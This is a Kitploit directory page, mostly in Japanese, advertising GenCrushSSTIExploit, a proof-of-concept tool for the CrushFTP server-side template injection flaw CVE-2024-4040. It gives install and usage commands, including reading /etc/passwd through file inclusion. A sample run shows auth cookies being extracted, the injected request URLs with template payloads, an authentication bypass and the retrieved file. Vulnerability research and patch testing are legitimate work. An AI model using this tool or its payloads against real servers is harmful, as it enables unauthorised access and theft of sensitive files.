Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
GenCrushSSTIExploit — CVE-2024-4040 の PoC であり、CrushFTP の SSTI 脆弱性を悪用するためのツールです。 | Kitploit
ツール/GitHubGitHub/geniuszly/gencrushsstiexploit
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト認証学習と教育
GitHubgeniuszly/gencrushsstiexploit

GenCrushSSTIExploit

CVE-2024-4040 の PoC であり、CrushFTP の SSTI 脆弱性を悪用するためのツールです。

リポジトリを見る
811年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

EN

GenCrushSSTIExploit は、CrushFTP の CVE-2024-4040 における SSTI(サーバーサイドテンプレートインジェクション)の脆弱性を標的とした PoC エクスプロイトツールです。このツールは、教育および倫理的ハッキング目的のみでこの脆弱性を悪用する方法を示します。

特徴

  • CrushFTP サーバーとのセッションを確立し、認証クッキーを抽出します。
  • SSTI の脆弱性を悪用してペイロードを注入します。
  • 認証をバイパスし、サーバーから機密ファイルを抽出しようとします。
  • rich を使用して、美しくスタイルされたコンソール出力を実現します。

免責事項

⚠️ このツールは責任を持って使用してください!本ツールは研究および教育目的のみを対象としています。作者は、このツールの誤用またはそれによって生じた損害について一切の責任を負いません。

インストール

前提条件

  • Python 3.7+
  • pip(Python パッケージインストーラー)

リポジトリのクローン

root@kitploit:~
git clone https://github.com/geniuszly/GenCrushSSTIExploit
cd GenCrushSSTIExploit

必要なパッケージのインストール

root@kitploit:~
pip install -r requirements.txt

使用方法

基本コマンド

root@kitploit:~
python GenCrushSSTIExploit.py -t <TARGET_URL>
  • -t / --target: 脆弱な CrushFTP サーバーのターゲット URL を指定します。

オプションパラメータ

  • -l / --lfi: ローカルファイルインクルージョン(Local File Inclusion)。抽出するファイルを指定します。
  • -w / --wordlist: ファイルパスをブルートフォースするためのワードリストを指定します。

例

root@kitploit:~
python GenCrushSSTIExploit.py -t http://example.com -l /etc/passwd

出力例

root@kitploit:~
★ Добро пожаловать в GenCrushSSTIExploit ★
CrushFTP SSTI PoC (CVE-2024-4040)
Автор: geniuszly
Использование: только для учебных и этических целей
--------------------------------------------------

[*] Подключение к ServerSessionAJAX...

[+] Успешно подключено к ServerSessionAJAX
[+] Куки CrushAuth: abc123def456ghi789
[+] Куки currentAuth: xyz987

[*] Попытка эксплуатации уязвимости SSTI...

[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={hostname}&names=/a

[+] Успешная эксплуатация уязвимости SSTI
[+] Ответ сервера: Hostname: example.com

[*] Попытка обхода аутентификации...

[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={working_dir}&names=/a

[+] Обход аутентификации успешен
[+] Извлечение /etc/passwd...
[+] Успешное извлечение /etc/passwd
[+] Извлеченное содержимое:
root:x:0:0:root:/root:/bin/bash
...
ツールをダウンロード